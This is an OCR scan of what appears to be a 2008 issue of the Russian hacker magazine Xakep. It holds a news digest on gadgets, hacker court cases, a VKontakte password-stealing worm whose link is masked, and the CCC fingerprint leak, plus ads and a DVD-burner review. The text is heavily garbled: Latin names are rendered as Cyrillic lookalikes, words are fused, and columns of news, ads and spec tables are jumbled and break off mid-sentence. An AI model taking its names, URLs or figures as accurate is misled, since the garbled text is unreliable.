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За почти уже 10 лет существования журнала мы сделали 
целую кучу дисков с огромным количеством хакерского 
видео, сорцов и редких программ. И вотнедавно появи- 
ласьсупер-идея сделать полный архив нашихдисковых 
материалов, доступный через интернет любому человеку. 
Но возникла достаточнозабавная проблема^ насфизи- 



самые старые диски □с — ты можешь здорово нам помочь 
и внести свой вклад в развитие журнала. Все, что нужно 
— это написать на бѵсКЭгеаІ.хакер.ги о том, какие диски у 
тебя есть. 

Р.Б. К выходу журнала часть архива уже будет доступна 
на сіѵб. хакер. гы . 



чески нетни одного диска добО номера и нехватаетне- 



пікііогг, гл. ред. X 



которых других дисков. Поэтому, еслиутебя сохранились 



исіаіііе.ііѵеіоигпаі.сот 
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МАРИЯ «МІРПІІ_І_» НЕФЕДОВА 

/ мігпи.і.@піооіск.п(і / 



Обо всем за последний месяц 




И снова нас радует эклюзивами компания «Эльдорадо», на этот раз мо- 
бильниками в количестве сразу двух штук. Первая новинка — телефон 5опу 
Егісзбоп 0900 с сенсорным 2.4-дюймовым дисплеем, призванный значи- 
тельно облегчить жизнь активным людям. Аппарат представляет собой лич- 
ный органайзер с календарем, контактами, расписанием, заметками и так 
далее, где добраться до любой из функций можно буквально одним кликом. 
Плюс ко всему, в нем имеется встроенная 5-мегапиксельная камера, способ- 
ная делать снимки печатного качества, а также реализована возможность 



доступа к сети через беспроводной І_АЫ (\Л/І_АІ\І). 

Вторая новинка — Ыокіа N78, тоже ориентирована на тех, кто постоянно в 
движении. Она обладает встроенным А-ѲР5 модулем, 2,4-дюймовым дис- 
плеем (не сенсорным), тоже умеет устанавливать беспроводную связь, в 
том числе, при помощи ѴѴі-Рі, и несет в себе основную встроенную камеру 
на 3.2 мегапикселя, и дополнительную СІБ-камеру (352x288 пикселей). Оба 
телефона в течение июня будут доступны исключительно в сети магазинов 
«Эльдорадо» в качестве специального предложения. 



64% 



быстрее 5 Мбит /сек 



Умная 5Р-карточка 



Быстро набирающий популярность американс- 
кий стартап БкуЬоок ( ѵѵѵѵѵѵ.зкѵЬоокѵѵігеІеБз.сот ) 
предлагает пользователям любопытную услугу. 
Имея в своем распоряжении огромную базу хот- 
спотов и описание их месторасположения, он 
может предположить местонахождение любого 
пользователя, который передаст ему информа- 
цию о найденных поблизости точках доступа. В 
Штатах, гдехотспотами напичкано буквально все, 
этот стартап пользуется бешеной популярностью. 
Дошло до того, что компания Еуе-Рі выпустила 
специальную версию 50-карты с интегрирован- 



ным внутрь модулем ѴѴі-Рі! Микроскопический 
модуль внутри Еуе-Рі Ехріоге (а именно так на- 
звали разработку производители) автоматически 
ищет рядом открытые ѴѴі-Рі сети и в каждой новой 
фотографии делает пометки о месторасположе- 
нии пользователя! Аавтоматизированная закач- 
ка фотографии через ѴѴі -б (на один из 20 сервисов, 
который выберет пользователь) хотя и выглядит 
уже нетак впечатляюще, но зато совершенноточ- 
но избавляет пользователей от переполнения их 
50-карточек. И приводит к необходимости чуть 
более часто заряжать аккумулятор :). 
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в22 раза увеличился средний размер шеЪ-страницы с 95 года. Сейчас средняя страница 

весит 312 Кб 
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НА ПРАВАХ РЕКЛАМЫ 




ТРИ ПОГРУЖЕНИЯ В МИР ЗАГАДОК. 

ТРИ ЗАХОДА К НЕПРОСТЫМ РЕШЕНИЯМ. 

ТРИ ИЗМЕРЕНИЯ ДЛЯ ВДОХНОВЕНИЯ... 

итри ВОЛНЫ ПРИЗОВ! 

МАТЕРИАЛИЗАЦИЯ ИНТЕРНЕТ-ЖЕЛАНИЙ 
И ГИГАБАЙТЫ ЦИФРОВОГО ПРОСТРАНСТВА. 
ГОТОВЫЕ СТАТЬ ЧАСТЬЮ ТВОЕГО МИРА! 

УВЛЕКАТЕЛЬНЫЙ процесс. 

содержательный РЕЗУЛЬТАТ! 

ЧТОБЫ СДЕЛАТЬ ОТКРЫТИЕ, ДОСТАТОЧНО ОТКРЫТЬ 

НОВУЮ ПАНКУ СНЕЭТЕРНЕЮ. 



ПОДРОБНОСТИ НА 

ѵши.МУСНЕЗТЕРРІЕЮ.ки 



НАСЛАЖДАЙСЯ НЕ СПЕША® 







СРОКИ ПРОВЕДЕНИЯ АКЦИИ: С 10 МАЯ 2008 Г. ПО 31 ДЕКАБРЯ 2008 Е 



МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕД' 



ог 



ДАЕТ: 



КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 








Размер и меет 
значение 



Компания Бепоѵо выпускает на российский рынок но- 
вый ноутбук— ІсІеаРасІ Ш 10. В первую очередь отлича- 
ют машинку габариты— толщина всего 18.5 мм, а вес 1 .06 
кг. Такой ноутбук можно без проблем взять с собой куда 
угодно: хоть в деловую поездку, хоть на отдых. Широко- 
форматный мониторв 1 1 " выполнен вбезрамном варианте, 
что не только зрительно увеличивает экран, но и придает 
компьютеру особую элегантность. Усиливает визуальную 
привлекательность и текстурный орнамент, покрывающий 
крышку снаружи. На выбор предоставляются два цветовых 
решения — красный и черный. 

Технические же характеристики таковы: процессор Іпіеі 
Соге 2 Био І_7500 (І.бГГц, 4МБ, 800Мгц); 2ГБ ОЗУ; видео- 
карта ІпІеІѲМАХЗІ 00; жесткий диск на 120ГБ; пишущий 
ОѴй; подключение к сети через 10/100 ЕіЬегпеІ, ѴѴіРі, 
или опциональный ВІиеІооіН; встроенная камера на 
1 .3-мегапикселя. 

В целом, сочетание оригинального дизайна, ком- 
пактных размеров и уверенных технических ха- 
рактеристик делают этот компьютер не только 
хорошей рабочей машиной, но и стильным, 
современным гаджетом. 



Количество уникальных ІІг 1 "ЗДрССОВ в шведском интернете 
всего вдвое меньше населения Швеции 



швн 

по сети 



Люди часто сталкиваются с ситуа- 
цией, когда какое-то устройство на- 
ходится удаленно и кроме как через 
локальную сеть к нему доступа нет. 
Хорошо, если это устройство имеет 
ЕіЬегпеІ-вход и удаленные подклю- 
чения, но если нет? Что если необ- 
ходимо на расстоянии подключить 
принтер или, скажем, жесткий диск? 
В этой ситуации тебе поможет мини- 
атюрноеустройствоЫеіЗЬагеЗіабоп, 
которое производит компания 
І06ЕАВ. Внешне оно представляет 
собой обычный ИЗВ-хаб, позволя- 
ющий подключить до 4-х устройств 
одновременно стой лишь разницей, 
что на задней части коробочки нахо- 
дится разъем Р-І-45! Таким образом, 
хаб получается доступным по сети 
и может находиться где угодно! Как 
его настроить? Да проще простого. 
Благодаря технологии ІІРпР с этим 
справится последний чайник. Ус- 
тройство можно купить у произво- 
дителя на сайте ѵѵѵѵѵѵ.іооеаг.сот по 
цене $79.95. 




Грызун для 
пре красного 



пола 



Всем известно, что большинство девушек 
боятся мышей, нобудьуверен — отэтого гры- 
зуна твоя подруга придет в восторг. Компания 
Окііск, занимающаяся созданием исключитель- 
но мышей и кибордов, разработала данную модель 
специально для прекрасной половины человечест- 
ва, с учетом их взглядов и пожеланий. Благодаря своим 
скромным габаритам, проводная, оптическая Окііск 505 5 
(«5» здесь обозначает ЗтаЩ не только придется дамам «по 
руке», но и спокойно поместится даже в маленькую дамскую 
сумочку, так что ее легко можно взять с собой куда угодно. А 
подключение по 115В (драйвера не требуются) и полуторамет- 
ровый шнур делают девайс более чем мобильным. Говоря о 
технических характеристиках, стоит также отметить и сенсор с 
разрешением 800 брі. 

Не подкачал и дизайн — поверхность мыши выполнена из спе- 
циального нескользящего пластика, со вставками цвета «ак- 
вамарин», что решает как вопрос визуальной эстетики, так и 
вопрос удобства в использовании. 



► 006 
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ТЬе ІЛіігпаІ^ѴІШ^І Ехрегіепсе 



Непревзойденно®, качество 
изображенья в компьгоѴерных играх 



тм 
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олгоиграющая 



музыка 



Компания Оідта представила на суд публики 
новый мультимедийный плеер Оідта МР750, 
способный работать нон-стоп в течение 40 
часов, без подзарядки. Стольдолгое вре- 
мя работы — заслуга нового встроенного 
аккумулятора повышенной емкости, но это, 
разумеется, не единственная положительная 
особенность данного гаджета. Плеер отличают 
ТРТ-дисплей 2,4" на 262000 цветов, сенсорная 
панельуправления, удобная навигация по 
меню с моментальным доступом к любому треку, 
а также возможность прослушивания радио в 
РМ диапазоне. Плюс ко всему, на МР750 можно 
просматривать фото и воспроизводить видео 
в формате .аѵі, а прилагающийся к плееру 
софт позволяетбез проблем конвертировать и 
файлы других видео-форматов. Ну и в качестве 
последнего штриха — плеер поддерживаеттек- 
стовые форматы, так что на нем вполне можно 
читать книжку и одновременно слушать музыку. 
Объем встроенной памяти машинки составит 
1 ,2 и 4Гб, а стоимость будет равна 2100 руб. за 
гигабайт памяти. 



В Е Ь»: 



Я Пйщга 



МііБІС 



54 , 5 % страниц используют тег 8Іу1С для хранения 
стилей. А средний С55-файл весит 6575 байт 



Я 



ниме — враг ви 



шшшт 



В последние годы суды над хакерами, вирусмейкерами и прочими яркими 
представителями «черношапочного» андеграунда стали не такой уж и 
редкостью. И хотя Фемида многих стран до сих пор не имеет в свои руках 
эффективного оружия в борьбе с оными, как известно, на каждый хитрый 
болт, найдется своя гайка. Так, хакеров часто стали ловить на мелочах, 
к самим взломам имеющим весьма отдаленное отношение. Яркий тому 
пример — процесс, прошедший в конце мая над 23-хлетним вирусмей- 
кером Масато Накацудзи (Мазало Ыакаізиіі) из Японии. Так как в Стране 
восходящего солнца законов, запрещающих создавать вирусы попросту 



нет, парня судили за... нарушение авторских прав. Вирь, написанный 
креативным выпускником Осакского университета электрокоммуника- 
ций, в конце 2007 распространялся через фалообменник ѴѴіппу и после 
заражения машины стирал все файлы на жестком диске. Но все дело в 
том, что вирус при этом маскировался под кадры из известного аниме 
«Сіаппаб», и официально Масато осудили именно за использование 
этих изображений без разрешения авторов. Дали емутри года условно, и 
стоит заметить, что он стал первым японцем, арестованным за написание 
вируса. 








БЕРЕГИ шт 

ПРИГОДИТСЯ НА ЕВРСі-2008! 





Соса-Соіа и контурная бутылка являются зарегистрированными товарными знаками ТИе Соса-Соіа 
Сотрапу. © 2008 ТЬе Соса-Соіа Сотрапу. Напиток сертифицирован. На правах рекламы. 
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Воровать инет — это плохо 




Страна с самым тупым интернетом — это Руащ 
ИЬчти 97%подключений в этой стране — 

медленнее 256К 




Пока в Японии ловят вирусмейкеров и изыскиваютспособы 
призвать их к ответу, у нас тоже успели осудить очередного 
сетевого мошенника, правда, в нашем случае все гораздо 
прозаичнее. Какни парадоксально, но в нашей стране еще 
остались люди, которые до сих пор предпочитают сидеть на 
ворованном интернете, когда А05І_ по сходной цене добрался 
уже до самой глубинки. Страсть кхалявеу нашего брата 
просто неискоренима, но за нее рано или поздно приходится 
расплачиваться. Так и случилось с 24-летним Петром Спири- 
доновым из Екатеринбурга, который умудрился пользоваться 
для поключения к Сети чужим аккаунтом аж с самого 2006 
года. В итоге, прокуратуре стало известно (каким образом, 
не уточняется), что упомянутый товарищ выходит в сеть под 
логином\пассвордом, принадлежащим некой коммерческой 
организации, вто время какпо закону эти данные являются 
коммерческойтайной. Спиридоновуспел законнектиться к 
интернету более 600 раз, нанеся, тем самым, предприятию 
ущерб в размере 4000 рублей. Суд вынес приговор потрем 
статьям: 183 (Незаконное получение и разглашение сведе- 
ний, составляющих коммерческую тайну), 1 65 (Причинение 
имущественного ущерба путем обмана или злоупотребления 
доверием) и 272 (Неправомерный доступ к компьютерной 
информации) и приговорил любителя бесплатного инета к 
штрафу в размере 48 тысяч рублей. 



Самый страшный ви 



ГЗЗЭ 



Забавный конкурс организовала компания З.ІЧ.ЗаІе&ЗоЛѵѵаге. Участникам 
предлагается нарисовать «Самый страшный вирус» и с 1 -го июня по 31 августа 
прислать рисунок на специальный ящик ргйза^епзоЛ.сот . Лучшие работы учас- 
тников будут вывешены на сайте компании. Победитель конкурса получит в пода- 
рок флэшку (1 Гб) и годовую лицензиюЗпЗРго Оеіихе; автор рисунка, занявшего 
второе место — оптическую мышку и годовую лицензию ЗпЗ Рго+ Апіізруѵѵаге, 
а участнику, занявшему третье место придется довольствоваться гарнитурой и 
годовой лицензией на ЗпЗ Рго. 



Российская Википедия вышла на почетное ІО 
место по количеству статей: всего их сейчас больше 



Б\у софт 



280000 



по сходной цене 



Интересный судебный процесс завершился в США в конце мая. А 
судился простой человек Тимоти Вернор (ТітоШу Ѵегпог) с крупной 
софтверной компанией АіЛосІезк, производителем и дистрибьютором 
всем известного АиіоСАй. Дело в том, что Тим зарабатывает на жизнь 
продажей на ЕВау б\у комиксов, книг, видеоигр и тому подобно- 
го, прямо скажем, барахла. Но стоило ему выставить на продажу 
по юзанные копии АіЛоСАО, как его тут же обвинили в нарушении 
авторских прав. Вернор не раз объяснялся по этому с ЕВау, доказы- 
вая, что продает лицензионные, подержанные копии программы (на 
ЕВау строжайше запрещено пиратство), но АіЛосІезк упорствовали, и 
в итоге аккаунт Тима заблокировали. АіЛосІезк же на достигнутом не 
остановилась и подала на «злостного нарушителя копирайтов» в суд, 
но, в итоге, процесс проиграла. Федеральный окружной судья штата 
Вашингтон постановил, что обладатель лицензионной версии ПО, 
имеет полное право перепродать свою копию программы, например, 
на интернет-аукционе. И пусть мы живем не в США, и пиратство у нас 
процветает, — прецедент в любом случае интересен. 




► 010 





Ваши способности. Наше вдохновение. 




ѴѴіпсІоѵѵз Бегѵег 2008 



В современном мире ИТ вам потребуется сервер, 
который железно будет работать. 



МісюзоЛ 



Поэтому, создавая ѴѴіпсІоѵѵз Зегѵег® 2008, 
мы применили такие инновационные решения, 



как отказоустойчивая кластеризация и возможность 



установки в режиме ЬегѵегСоге. Эти решения 



помогают избегать угрозы безопасности 
™ и обеспечивать сверхвысокую надежность! 



Встречайте новый ѴѴіпсІо\л/$ Ьегѵег 2008 

на ѵѵѵѵѵѵ.ѵѵіпсІоѵѵ5-5егѵег.ги 
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© 2008 Місгской: Согрогаііоп. Все права защищены. Владельцем товарных знаков МісгозоЙ, ѴѴіпсІоѵѵз Зегѵег, зарегистрированных на территории США и/или других стран, 
и владельцем авторских прав на их дизайн является корпорация МісгозоИ Другие названия компаний и продуктов, упомянутых в тексте, могут являться зарегистриро- 
ванными товарными знаками соответствующих владельцев. Реклама. 








Наверное, многие помнят дурацкий тест, совсем недавно гулявший по сети — «Сколь- 
ко унитазов втвой клавиатуре?». Он подсчитывал примерное количество микробов, 
регулярно скапливающихся на мыши и клаве, исходя изтого, как частоты здороваешься 
слюдьми за руку, хватаешься за грязные поручни втранспорте итакдалее. Конечно, тест 
был всего лишь приколом, но, как известно — в каждой шутке естьдоля шутки. Данный 
случай не исключение и клавиатуру с мышкой, в самом деле, стоит регулярно чистить, 
потому как микробы там, и правда, имеют место. Но, похоже, наши восточные друзья 
придумали более радикальный метод. В конце этого лета в продажу поступит первый 
антибактериальный набор, состоящий из мыши с клавиатурой. 

Разработала новинку тайваньская компания ВеЬаѵіогТесЬ СотріЛег, и основная осо- 
бенность комплекта ВТС-АВ51 09 заключается в высокоэффективном биоцидном вещес- 
тве, добавленном непосредственно в пластик. Благодаря нему, большинство бактерий, 
обычно переносимых на руках, уничтожаются. По понятным причинам сет в первую 
очередь рекомендован к использованию в школах, больницах и других общественных 
местах. 




Эпидемия 

ВКонтакте 



Популярнейшая социальная сеть Вконтакте.ру подвер- 
глась серьезной вирусной атаке, заставившей крупные 
антивирусные лаборатории срочно обратиться к народу 
с призывами быть внимательнее, а заодно лишний раз 
порекомендовать «летать только нашими авиалиниями», 
то есть, пользоваться именно их продуктами. Причиной 
переполоха стал червь ѴѴіп32.НІ_І_ѴѴ.Ап{іОигоѵ, рассы- 
лающий себя под видом обычной прикольной картинки. 
Ссылка ведет на сайт Ыір ■//****** т і вес иге, со т/сіеіі. 
і р а . но реально по ссылке мы получаем не ірд, а файл беіі. 
вег с тем самым червяком. Устанавливаясь в системе, 
он ищет в соокіез пароль от Вконтакте, и если находит, 
то продолжает рассылать себя и дальше по списку кон- 
тактов очередной жертвы. Но вряд л и вирусу удалось бы 
поднять такой шум, если бы он не делал еще одну вещь 
— 25-го числа каждого месяца, в 10 утра, червь выводит 
на экран сообщение: «Павел Дуров Работая с «ВКонтак- 
те. РУ» Вы ни разу не повышали свой рейтинг и поэтому 
мы не получили от Вас прибыли. За это Ваш компьютер 
будет уничтожен! Если обратитесь в милицию, то сил ьно 
пожалеете об этом!» и начинает уничтожать все файлы на 
диске С:. Так что, всем видевшим картинку с забавными 
червячками, в самом деле, стоит проверить машину на 
вирусы. И желательно, до 25-го числа :). 



Пертур бации 
на ЕВаѵНІН 



На крупнейшем интернет-аукционе ЕВаухогп произош- 
ли серьезные изменения в системе подсчета !еес!Ьаск’ов. 

Если раньше оставить негативный или нейтральный отзыв 
друг другу могли как покупатель, так и продавец, то теперь 
продавцы такой возможности лишились. Согласно официаль- 
ному заявлению — возможность получить в ответ негативный 
ІеесІЬаск пугала покупателей, и зачастую из-за этого они не 
решались«покарать» негативом нечестных, невнимательных 
и так далее селлеров. Теперь же руки у покупателей развяза- 
ны, и можно более не опасаться мести. С баерами, которые по- 
пытаются злоупотреблять новым положением, еВау обещает 
разбираться самостоятельно. 

Помимо этой довольно радикальной меры изменилась и сама 
система подсчета отзывов — теперь рейтингпродавца рас- 
считывается исходя изІесІсІЬаск’ов полученных за последний 
год, а не за все время регистрации, какэто было раньше. Из-за 
этого рейтингу большинства продавцов испортился в зави- 
симости от количества нейтральных и негативных отзывов. В 
итоге, продавцы с рейтингом 100% стали чем-то вроде редкого 
вида, многие лишилисьзваний РоѵѵегЗеІІег’ов, и недовольство 
комьюнити очень велико. Если в ближайшем будущем последу- 
ютбойкоты аукциона — это будетсовсем неудивительно. 




ѴѴікіресІіа У России этот показатель ровно в 



раз меньше 
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СОЗДАН, ЧТОБЫ ВОСХИЩАТЬ 



> Новый А300 - идеальное 
сочетание современного 
дизайна и новейших 
технологий. 



> Это называется 
«Интеллектуальная красота». 
Создано ТозНІЬа. 




Информационный центр: 

8 - 800 - 100 - 05-05 (города РФ) 

8 - 495 - 883 - 05-05 (Москва) 



сотриіегз.іозЫЬа.сот.ги 



На базе процессорной технологии 
ІпіеІ® Сепігіпо® 



ІпіеІ, логотип ІпіеІ, Сепігіпо, Сепігіпо Іпзісіе, ІпіеІ Соге и Соге Іпзісіе являются товарными знаками корпорации ІпіеІ в США и других странах. 



Реклама 





^ тедапеѵг 



Конференция 



геМІХ 



23-го мая в Москве, в Колонном зале Дома союзов, состо- 
ялась первая конференция геМІХдля веб-разрабочиков 
— своего рода ответвление от известной ежегодной 
конференции МІХ, которую МісгозоЙ проводила в США 
уже трижды. Равно как и ее «старший брат», геМІХ ори- 
ентирована на людей, чья работа так или иначе связана 
с онлайновыми технологиями и разработками, то есть, 
балом правили веб-разработчики и веб-дизайнеры. 
Самым ярким событием конференции бесспорно можно 
назвать блиц- визит в Москву Стивена Балмера — СЕО 
МісгобоШ Все прошло мирно (напомню, что, например, 
в Венгрии его закидали яйцами). В ходе часовой беседы 
с Антоном Носиком (известным сетевым деятелем, при- 
ложившим руку к созданию 6аіе1:а.ги, Ѵезіі.ги, ЫеѵѵзРи. 
сот и т.д., журналистом и ныне главой службы блогов 
компании «51ІР РаЬгік») Балмер фактически дал послед- 
нему интервью и ответил на вопросы из интернета. Среди 
прочего он подтвердил, что сделка по покупке компа- 
нии УаЬоо не состоится, и заверил, что найти другое 
применение 50 миллиардам долларов труда не составит. 
Подтвердил Балмер и тот факт, что прекращать поддер- 
жку ХР в ближайшем будущем МісгобоД не собирается, 
чего нельзя сказать о ее продажах — финальное решение 
по этому вопросу еще не принято. Так же в разговоре 
были затронуты темы ореп Боигсе, инноваций в области 
веб-технологий и пиратства, но ничего нового по ним 
сказано неб ы л о. Необошлосьи без доли юмора. Так, 
отвечая на вопрос из Сети, касательно того, видел л и он 
фильм «Пираты Кремниевой долины» и как относится к 
своему персонажу в оном, Балмер сообщил, что хорошо 
относится и к самому фильму, и к своему персонажу, 
после чего хитро рассмеялся и добавил, что он вообще, в 
целом, «пісе диу». 

Но визитом главы МісгобоЙ конференция, конечно, не 
закончилась. В течение дня на геМІХ было зачитано 5 
технических докладов — по БіІѵегІідЫТМ 2.0, технологии 
Іпіегпеі Ехріогег® 8, ѴѴіпсіоѵѵб Бегѵег® 2008 и I пЕе гп еі 
Іпіюгтаііоп Бегѵісез 7 (1157). И под вечер состоялся круг- 
лый стол с участием Сергея Рыжикова, Алекса Экслера, 
Антона Носика, Дмитрия Завалишина, Петра Диденко и 
Владимира Габриеля. Тема «Будущее МісгобоЙ в Вебе» 
дала участникам весьма широкое поле для обсуждений, 
а присутствующие разработчики смогли задать свои 
вопросы представителям МісгобоЙ и другим участникам 
дискуссии. 
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Нет биометрике 
в документах ! И 



В Европе вовсю вводят в обиход паспорта с использованием 
биометрических данных, но далеко не всем это по душе, и 
протестует каждый по-своему. Хак-группа Сбаоз Сотриіег 
Сіи Ь (или же ССС) разжилась отпечатком пальца главы МВД 
Германии Вольфганга Шойбле и открыто опубликовала его 
в своем журнале йіе ОаІепзсЫеисІег, присовокупив к этому 
подробный мануал по переснятию и подделке отпечат- 
ков пальцев. А «пальчики» Шойбле ССС спокойно сняли 
со стакана, из которого он пил во время одного из своих 
выступлений. Помимо этого хакеры заявили, что планиру- 
ют добавить в свой «биометрический альбом» отпечатки 
канцлера Ангелы Меркель и министра-президента Баварии 
Гюнтера Бекштейна. Разумеется, данный «альбом» доступен 
всем и каждому, а распространение чужих отпечатков — дело 
теоретически уголовно наказуемое. Как говорится, был бы 
прецедент. Однако реакция со стороны германского МВД 
пока последовала весьма мягкая — там отметили, что снятие 
отпечатков со стекла никак не компрометируетбиометричес- 
кие паспорта и данная методика известна давным-давно. 





Эксперты в технологии ТВ»тюнеров 

ѴісіеоМаІе Ѵ300 Автономный ТВ-тюнер 




ГІрічн іпіпииу : ТИ г>впас 
рЕП!П»гг«С »■ іЛШ.ѵіК Г (НОР 
РСГІИІСС -мм прдотор 
Кеичсігві-т'чііі 
ІТРЬИІ С ПЭЦР.В'ЭЖГВ І'ІЛѴ 
пт «йч'4М>п дс 1МЛ 
ГІацда :• • ■ ра.ір*-іі<е-*ия 
ймиісра да ІОФЗіІйЭДн 

нкимма 



Ищите подкади щи и Вашим ігпрасаѵ ТВ тюнер а блирашиди магазин о машм.і партмероШ 




і ыы- л 
р* , п*’* 





Геггигп 




САМОДИЩГ^И 



Копирование и хранение информации всегда было вопросом актуальным — та- 
ким и остается. Флешки объемом 8 Гб значительно дороже, чем двухслойная 
болванка, а скорости чтения и записи при работе с оптическим диском больше, 
нежели предлагает флеш. Итак, мы снова пишем на болванки. 



Н МЕТОДИКАТЕСТИРОВАНИЯ 

Чтобы определить возможности устройства и сравнить приводы между 
собой, мы воспользовалисьутилитой, идущей в пакете с Ыего Вигпіпд 
Кот, — Мего СО-ОѴй БреесІ. Ты тоже можешь бесплатно скачать ее для 
тестов или ознакомления. При помощи утилиты можно наблюдать за 
графиком прожига болванки, на котором отображаются две кривых: 
желтая — скорость вращения шпинделя, и зеленая — скорость записи. 
В идеале, кривые записи и чтения должны быть без резких скачков, 
что будет свидетельствовать о качественном прожиге и минимальном 
уровне ошибок. Для теста были отобраны ОѴО-болванки ѴегЬайт с 
заявленной скоростной характеристикой 1 6Х. Есть приводы, которые 
способны работать и на больших скоростях, но так как 0Ѵ0 со скоростью 
записи выше 1 6Х в продаже найти не удалось, мы использовали те же 
диски. По результатам тестирования были получены скорость и время 
записи и чтения. 




ВРЕМЯ ЗАПИСИ 



Т55Тсогр 5Н-52030 




I Тестовый стенд: 

МаттілатеН\5и^\8^^^[ 



РІ.ЕХТСЖ РХ- 
8ооА 

РІОЫЕЕР РѴР-215 

Орііагс АО-7203 

1_С6Н20№10 

А5Ц5 0РѴѴ- 
2014І-1Т 

О 50 100 150 200 250 300 350 400 450 



сек (меньше лучше) 



Насра внительном графике привод от А51І5 заметно отстает по времени 



ТЕ5Т_ЬАВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕН- 
НОЕ НАТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ ИНТЕРНЕТ-МАГАЗИНУ 
ОІСІТАЬЗНОР.Яи (Т.1495) 730-7758), А ТАКЖЕ РОССИЙСКИМ 
ПРЕДСТАВИТЕЛЬСТВАМ КОМПАНИЙ А5У5 И 1.0 
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Технические характеристики: 

5АТА 

О бъе м буфе р а : 2 М б 

■ і /| | ’ СР-К/КѴѴ/ОѴО+К/-К/+КѴѴ/-К ОІ./+К 



Технические характеристики: 

Интерфейс: БАТА 
Объем буфера: 2 Мб 

Поддерживаемые форматы чтения | СР-К/КУУ/РУР*Н/-Р / *КУУ/-К РІ./+ К 



ОЦ- КѴѴ/ВАМ 

Поддерживаемые форматы записи: СР-К/КѴѴ/ РѴР +К/-К /+ КѴѴ/-К РІ-/ +К 



РІ./-КѴѴ/КАМ 

Поддержи ваем ы е фб рматы за пи с и | СР-Р/РѴУ/РѴР+ К/-К/+КѴѴ/-К РІѴ+ К 



Ри-РѴѴ/РАМ 

Скорости чтения СО/РѴР: 48Х/16Х 
Поддержка І_і§Щ:5сгіЬе:Д0 

Скорости записи: СР-Р48Х, СР-КѴѴ32Х, РѴР+Р20Х, РѴР+Р РІ_ 8х, 
РѴР+ГСѴѴ 8х р РѴР-Р 20х, РѴР-Р РІ_ 8х р РѴР-РѴѴ 6х, РѴР-РАМ14Х. 



Ри-РѴѴ/РАМ 

Скорости чтения СРД)Ѵ0: 48Х/16Х 
Щ|ідд е рШкр2ІЯІ|іШ1І ІИ : н й 

Скорости записи: СР-Р48Х, СР-РѴѴ32Х, РѴР+Р 20х, РѴР+Р Р1.12Х, 
РѴР+РѴѴ 8х, РѴР-Р 20х р РѴР-Р РІ_ 12х, РѴР-РѴѴ 6х, РѴР-РАМ 12х. 



0 0 0 0 0 



о 



На этот раз в наши руки попал девайс А51І5 ОНѴѴ-2014І_1Т. Каки положено 
современным устройствам, подключается по шине 5АТА — быстро, удобно и 
практично. Привод работаетсо всемитипами оптических дисков эры Сй и 
ОѴй и поддерживаеттехнологию ЫдЫЗсгіЬе, которая позволяет выводить 
произвольный монохромный рисунокна нерабочей поверхности диска 
(учти, что для этого необходимо покупать специальные болванки с дополни- 
тельным слоем]. Заявлено, что скорость записи составляет 20Х для дисков 
ОѴй+Р. В нашем случае устройство вело себя странно и показало макси- 
мальный результат на уровне 15Х. Крометого, к концу записи былизаметны 
сильные скачки скорости. В итоге, длительность прожига составила 6 с 
половиной минут. Что касается процедуры чтения той же болванки, то скач- 
ков скорости не наблюдалось, а максимум был достигнут на скорости чуть 
больше 1 2Х — заметно меньше заявленных 1 6Х. На чтение болванки было 
затрачено 6 минутЗб секунд. Девайс немного разочаровал по скоростным 
показателям, но порадовал стабильностью и безошибочностью чтения. 

Если утебя есть видеокамера, которая работаете болванками ОѴО-ВАМ.то 
с этим приводом будет гораздо удобнее переписывать отснятый материал 
без посредничества камеры. 



Компания І_6 известна практически всем — благо, занимается она произ- 
водством нетолько комплектующих и периферии, но и бытовой техники. 
Столь широкий ассортимент продукции не снижает качества. Привод 
подключается по шине 5АТА. Объем буферной памяти составляет2 Мб (как 
показали тестирования, использование большего буфера не даетособых 
преимуществ, но сказывается на цене устройства). «Резак» отлично справ- 
ляется со всеми оптическими дисками эпохи СО/ОѴй — включая ОѴй-РАМ 
— как при работе на чтение, так и на запись. Максимальная скорость чтения 
СО и йѴО составляет 48х и 16х, соответственно. Однослойные болванки 
однократной записи прожигаются на скорости 20х, а двухслойные — 12х; не 
придется долго ждать при записи 9 Гб данных. Работа с ОѴО-РАМ ведется 
на скорости 12х, что неплохо, учитывая, что работать стаким типом диска 
можно, как с обычным винчестером. Поддержки технологии І_ід5Ы:5сгіЬе 
нет, так что болванки придется по старинке подписывать маркером или 
пользоваться специальным принтером. На запись однослойной болванки 
привод затратил почти 5 минут и достиг максимальной скорости 18,32х. К 
томуже, наблюдались скачки скорости. Прочитанже дискбыл за 4 минуты 
51 секунду (время чтения практически равно времени записи) — и без 
ошибок. Максимум скорости чтения был достигнут и даже слегка превышен. 
Устройство во время теста практически не нагрелось, а издаваемый шум 
был не на много вышеуровня громкости системных вентиляторов. 
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Технические характеристики: 

Объем буфера: 2 Мб 
Поддерживаемые форматы чтени 

йІѴ-КѴѴ/КАМ 

Поддерживаемые форматы записи 

06/-РѴѴ/РАМ 

Скорости чтения СИ/ОѴІ 
Поддержка ІДіівсгіЬе 
Скорости записи: С0-Р48х, СО 
8х, ЭѴО-Р 20х, ОѴЭ-Р ВІ12Х, О' 




Ц* Р 



РІ./+Р 




32х, йѴО+Р 20Х, ОѴй+Р Об8х, ОѴй+РѴѴ 
ѴѴбх, 0ѴР-РАМ12Х. 



РІОЫЕЕК йѴР-215 



840 руб. 



Техническиехарактеристики: 

Интерфейс: 5АТА 
Объем буфера 1 2 Мб 
Поддерживаемые форматы чтения 

ои-вм/кмл 

Поддерживаемые форматы записи 

ОІ./-КѴѴ/КАМ 

Скорости чтения СО/ОѴЮ: 46Х 
| оддё ; рШк|® ; ^Ш1|0Йе : ур 
С ко рости за п и с и : Сй-Р 40х, Сй-РѴѴ 32х, I 
йѴО+РѴѴ 8х, ОѴР-Р 20х, РУР-Р РЬ 1 0х, РѴР-РѴѴ 8х, РѴР-РАМ 12х. 




ООО 



ООО 



Один из двух девайсов втесте, подключаемый по шине ЮЕ. Спорить о пре- 
имуществах или недостатках не стоит (вспомним, что на старых материнских 
платах может не оказаться порта 5АТА или все порты будут заняты подклю- 
ченными жесткими дисками). Скорость записи не настолько велика, чтобы 
узким местом оказалась шина данных, поэтому вполне можно воспользо- 
ваться приводом с интерфейсом ЮЕ. Тот недостаток, что широкий кабель 
ухудшаетциркуляцию воздуха в системном блоке, решается покупкой специ- 
ального кабеля или правильной прокладкой проводов. Теперьо возможнос- 
